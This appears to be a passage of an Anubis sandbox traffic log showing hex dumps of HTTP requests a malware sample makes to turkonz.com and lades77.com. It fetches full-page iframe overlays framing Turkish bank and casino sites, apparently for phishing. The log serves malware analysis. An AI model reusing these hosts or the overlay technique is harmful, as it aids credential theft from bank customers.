2230 2220 6d61 7267 696e 7769 6474 683d    "0" marginwidth=
2230 2220 2073 6372 6f6c 6c69 6e67 3d22    "0"  scrolling="
6e6f 2220 0d0a 626f 7264 6572 3d22 3022    no" ..border="0"
200d 0a66 7261 6d65 626f 7264 6572 3d22     ..frameborder="
3022 200d 0a74 6f70 3d22 3022 206c 6566    0" ..top="0" lef
743d 2230 223e 0d0a 596f 7572 2062 726f    t="0">..Your bro
7773 6572 2064 6f65 7320 6e6f 7420 7375    wser does not su
7070 6f72 7420 696e 6c69 6e65 2066 7261    pport inline fra
6d65 7320 6f72 2069 7320 6375 7272 656e    mes or is curren
746c 7920 636f 6e66 6967 7572 6564 200d    tly configured .
0a6e 6f74 2074 6f20 6469 7370 6c61 7920    .not to display 
696e 6c69 6e65 2066 7261 6d65 732e 0d0a    inline frames...
3c2f 4946 5241 4d45 3e3c 2f64 6976 3e      </IFRAME></div>

from ANUBIS:1080 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 628

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6761    GET /img/jpg/yga
722e 7478 7420 4854 5450 2f31 2e31 0d0a    r.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a33 3320 474d 540d 0a41 6363    4:23:33 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3338 6139 3561    s..ETag: "38a95a
3132 3764 6339 313a 6164 3966 6322 0d0a    127dc91:ad9fc"..
5365 7276 6572 3a20 4d69 6372 6f73 6f66    Server: Microsof
742d 4949 532f 362e 300d 0a58 2d50 6f77    t-IIS/6.0..X-Pow
6572 6564 2d42 793a 2050 6c65 736b 5769    ered-By: PleskWi
6e0d 0a58 2d50 6f77 6572 6564 2d42 793a    n..X-Powered-By:
2041 5350 2e4e 4554 0d0a 4461 7465 3a20     ASP.NET..Date: 
4672 692c 2032 3020 4d61 7220 3230 3039    Fri, 20 Mar 2009
2031 313a 3032 3a31 3520 474d 540d 0a0d     11:02:15 GMT...
0a68 7474 703a 2f2f 7777 772e 6c61 6465    .http://www.lade
7337 372e 636f 6d2f 696d 6167 6573 2f6a    s77.com/images/j
732f 7967 6172 2e74 7874                   s/ygar.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6761    GET /img/jpg/yga
722e 7478 7420 4854 5450 2f31 2e31 0d0a    r.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a33 3320 474d 540d 0a41 6363    4:23:33 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3338 6139 3561    s..ETag: "38a95a
3132 3764 6339 313a 6164 3966 6322 0d0a    127dc91:ad9fc"..
5365 7276 6572 3a20 4d69 6372 6f73 6f66    Server: Microsof
742d 4949 532f 362e 300d 0a58 2d50 6f77    t-IIS/6.0..X-Pow
6572 6564 2d42 793a 2050 6c65 736b 5769    ered-By: PleskWi
6e0d 0a58 2d50 6f77 6572 6564 2d42 793a    n..X-Powered-By:
2041 5350 2e4e 4554 0d0a 4461 7465 3a20     ASP.NET..Date: 
4672 692c 2032 3020 4d61 7220 3230 3039    Fri, 20 Mar 2009
2031 313a 3032 3a31 3520 474d 540d 0a0d     11:02:15 GMT...
0a68 7474 703a 2f2f 7777 772e 6c61 6465    .http://www.lade
7337 372e 636f 6d2f 696d 6167 6573 2f6a    s77.com/images/j
732f 7967 6172 2e74 7874                   s/ygar.txt

from ANUBIS:1081 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 738

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6761 722e 7478 7420 4854 5450 2f31 2e31    gar.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3136    ar 2009 11:02:16
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 343a 3238    an 2009 04:14:28
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 312d 3139 332d 3436 3131 6539 6666    051-193-4611e9ff
6535 3130 3022 0d0a 4163 6365 7074 2d52    e5100"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
330d 0a43 6f6e 7465 6e74 2d54 7970 653a    3..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6761 7261 6e74 692e 636f 6d2e 7472 2f69    garanti.com.tr/i
6e64 6578 2e68 746d 6c22 200d 0a77 6964    ndex.html" ..wid
7468 3d31 3030 250d 0a68 6569 6768 743d    th=100%..height=
3130 3025 2020 6d61 7267 696e 6865 6967    100%  marginheig
6874 3d22 3022 206d 6172 6769 6e77 6964    ht="0" marginwid
7468 3d22 3022 2020 7363 726f 6c6c 696e    th="0"  scrollin
673d 226e 6f22 200d 0a62 6f72 6465 723d    g="no" ..border=
2230 2220 0d0a 6672 616d 6562 6f72 6465    "0" ..frameborde
723d 2230 2220 0d0a 746f 703d 2230 2220    r="0" ..top="0" 
6c65 6674 3d22 3022 3e0d 0a59 6f75 7220    left="0">..Your 
6272 6f77 7365 7220 646f 6573 206e 6f74    browser does not
2073 7570 706f 7274 2069 6e6c 696e 6520     support inline 
6672 616d 6573 206f 7220 6973 2063 7572    frames or is cur
7265 6e74 6c79 2063 6f6e 6669 6775 7265    rently configure
6420 0d0a 6e6f 7420 746f 2064 6973 706c    d ..not to displ
6179 2069 6e6c 696e 6520 6672 616d 6573    ay inline frames
2e0d 0a3c 2f49 4652 414d 453e 3c2f 6469    ...</IFRAME></di
763e                                       v>

from ANUBIS:1082 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 318 - Transferred inbound Bytes: 634

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6368    GET /img/jpg/ych
6572 2e74 7874 2048 5454 502f 312e 310d    er.txt HTTP/1.1.
0a43 6f6e 7465 6e74 2d54 7970 653a 2074    .Content-Type: t
6578 742f 6874 6d6c 0d0a 486f 7374 3a20    ext/html..Host: 
7777 772e 7475 726b 6f6e 7a2e 636f 6d0d    www.turkonz.com.
0a41 6363 6570 743a 2074 6578 742f 6874    .Accept: text/ht
6d6c 2c20 2a2f 2a0d 0a55 7365 722d 4167    ml, */*..User-Ag
656e 743a 204d 6f7a 696c 6c61 2f33 2e30    ent: Mozilla/3.0
2028 636f 6d70 6174 6962 6c65 3b20 496e     (compatible; In
6479 204c 6962 7261 7279 290d 0a0d 0a      dy Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 320d 0a43 6f6e 7465 6e74 2d54 7970     42..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a33 3920 474d 540d 0a41 6363    4:22:39 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3432 3331 3631    s..ETag: "423161
3361 3132 3764 6339 313a 6164 3966 6322    3a127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a31 3620 474d 540d    09 11:02:16 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7963 6865 722e 7478 74           /js/ycher.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6368    GET /img/jpg/ych
6572 2e74 7874 2048 5454 502f 312e 310d    er.txt HTTP/1.1.
0a43 6f6e 7465 6e74 2d54 7970 653a 2074    .Content-Type: t
6578 742f 6874 6d6c 0d0a 486f 7374 3a20    ext/html..Host: 
7777 772e 7475 726b 6f6e 7a2e 636f 6d0d    www.turkonz.com.
0a41 6363 6570 743a 2074 6578 742f 6874    .Accept: text/ht
6d6c 2c20 2a2f 2a0d 0a55 7365 722d 4167    ml, */*..User-Ag
656e 743a 204d 6f7a 696c 6c61 2f33 2e30    ent: Mozilla/3.0
2028 636f 6d70 6174 6962 6c65 3b20 496e     (compatible; In
6479 204c 6962 7261 7279 290d 0a0d 0a      dy Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 320d 0a43 6f6e 7465 6e74 2d54 7970     42..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a33 3920 474d 540d 0a41 6363    4:22:39 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3432 3331 3631    s..ETag: "423161
3361 3132 3764 6339 313a 6164 3966 6322    3a127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a31 3620 474d 540d    09 11:02:16 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7963 6865 722e 7478 74           /js/ycher.txt

from ANUBIS:1083 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 161 - Transferred inbound Bytes: 742

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6368 6572 2e74 7874 2048 5454 502f 312e    cher.txt HTTP/1.
310d 0a43 6f6e 7465 6e74 2d54 7970 653a    1..Content-Type:
2074 6578 742f 6874 6d6c 0d0a 486f 7374     text/html..Host
3a20 7777 772e 6c61 6465 7337 372e 636f    : www.lades77.co
6d0d 0a41 6363 6570 743a 2074 6578 742f    m..Accept: text/
6874 6d6c 2c20 2a2f 2a0d 0a55 7365 722d    html, */*..User-
4167 656e 743a 204d 6f7a 696c 6c61 2f33    Agent: Mozilla/3
2e30 2028 636f 6d70 6174 6962 6c65 3b20    .0 (compatible; 
496e 6479 204c 6962 7261 7279 290d 0a0d    Indy Library)...
0a                                         .

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3137    ar 2009 11:02:17
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 333a 3132    an 2009 04:13:12
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 612d 3139 372d 3436 3131 6539 6237    04a-197-4611e9b7
3661 3630 3022 0d0a 4163 6365 7074 2d52    6a600"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
370d 0a43 6f6e 7465 6e74 2d54 7970 653a    7..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6368 6572 7279 6361 7369 6e6f 2e63 6f6d    cherrycasino.com
2f65 6e2f 696e 6465 782e 6a73 7022 200d    /en/index.jsp" .
0a77 6964 7468 3d31 3030 250d 0a68 6569    .width=100%..hei
6768 743d 3130 3025 2020 6d61 7267 696e    ght=100%  margin
6865 6967 6874 3d22 3022 206d 6172 6769    height="0" margi
6e77 6964 7468 3d22 3022 2020 7363 726f    nwidth="0"  scro
6c6c 696e 673d 226e 6f22 200d 0a62 6f72    lling="no" ..bor
6465 723d 2230 2220 0d0a 6672 616d 6562    der="0" ..frameb
6f72 6465 723d 2230 2220 0d0a 746f 703d    order="0" ..top=
2230 2220 6c65 6674 3d22 3022 3e0d 0a59    "0" left="0">..Y
6f75 7220 6272 6f77 7365 7220 646f 6573    our browser does
206e 6f74 2073 7570 706f 7274 2069 6e6c     not support inl
696e 6520 6672 616d 6573 206f 7220 6973    ine frames or is
2063 7572 7265 6e74 6c79 2063 6f6e 6669     currently confi
6775 7265 6420 0d0a 6e6f 7420 746f 2064    gured ..not to d
6973 706c 6179 2069 6e6c 696e 6520 6672    isplay inline fr
616d 6573 2e0d 0a3c 2f49 4652 414d 453e    ames...</IFRAME>
3c2f 6469 763e                             </div>

from ANUBIS:1084 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7365    GET /img/jpg/yse
6b2e 7478 7420 4854 5450 2f31 2e31 0d0a    k.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a35 3220 474d 540d 0a41 6363    4:23:52 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6234 6634 6463    s..ETag: "b4f4dc
3635 3132 3764 6339 313a 6164 3966 6322    65127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a31 3720 474d 540d    09 11:02:17 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7973 656b 2e74 7874              /js/ysek.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7365    GET /img/jpg/yse
6b2e 7478 7420 4854 5450 2f31 2e31 0d0a    k.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a35 3220 474d 540d 0a41 6363    4:23:52 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6234 6634 6463    s..ETag: "b4f4dc
3635 3132 3764 6339 313a 6164 3966 6322    65127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a31 3820 474d 540d    09 11:02:18 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7973 656b 2e74 7874              /js/ysek.txt

from ANUBIS:1085 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 738

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
7365 6b2e 7478 7420 4854 5450 2f31 2e31    sek.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3139    ar 2009 11:02:19
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 353a 3330    an 2009 04:15:30
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 372d 3139 332d 3436 3131 6561 3362    057-193-4611ea3b
3035 6338 3022 0d0a 4163 6365 7074 2d52    05c80"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
330d 0a43 6f6e 7465 6e74 2d54 7970 653a    3..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7365 6b65 7262 616e 6b2e 636f 6d2f 6465    sekerbank.com/de
6661 756c 742e 6a73 7022 200d 0a77 6964    fault.jsp" ..wid
7468 3d31 3030 250d 0a68 6569 6768 743d    th=100%..height=
3130 3025 2020 6d61 7267 696e 6865 6967    100%  marginheig
6874 3d22 3022 206d 6172 6769 6e77 6964    ht="0" marginwid
7468 3d22 3022 2020 7363 726f 6c6c 696e    th="0"  scrollin
673d 226e 6f22 200d 0a62 6f72 6465 723d    g="no" ..border=
2230 2220 0d0a 6672 616d 6562 6f72 6465    "0" ..frameborde
723d 2230 2220 0d0a 746f 703d 2230 2220    r="0" ..top="0" 
6c65 6674 3d22 3022 3e0d 0a59 6f75 7220    left="0">..Your 
6272 6f77 7365 7220 646f 6573 206e 6f74    browser does not
2073 7570 706f 7274 2069 6e6c 696e 6520     support inline 
6672 616d 6573 206f 7220 6973 2063 7572    frames or is cur
7265 6e74 6c79 2063 6f6e 6669 6775 7265    rently configure
6420 0d0a 6e6f 7420 746f 2064 6973 706c    d ..not to displ
6179 2069 6e6c 696e 6520 6672 616d 6573    ay inline frames
2e0d 0a3c 2f49 4652 414d 453e 3c2f 6469    ...</IFRAME></di
763e                                       v>

from ANUBIS:1086 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 628

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7465    GET /img/jpg/yte
6b2e 7478 7420 4854 5450 2f31 2e31 0d0a    k.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a31 3820 474d 540d 0a41 6363    4:24:18 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
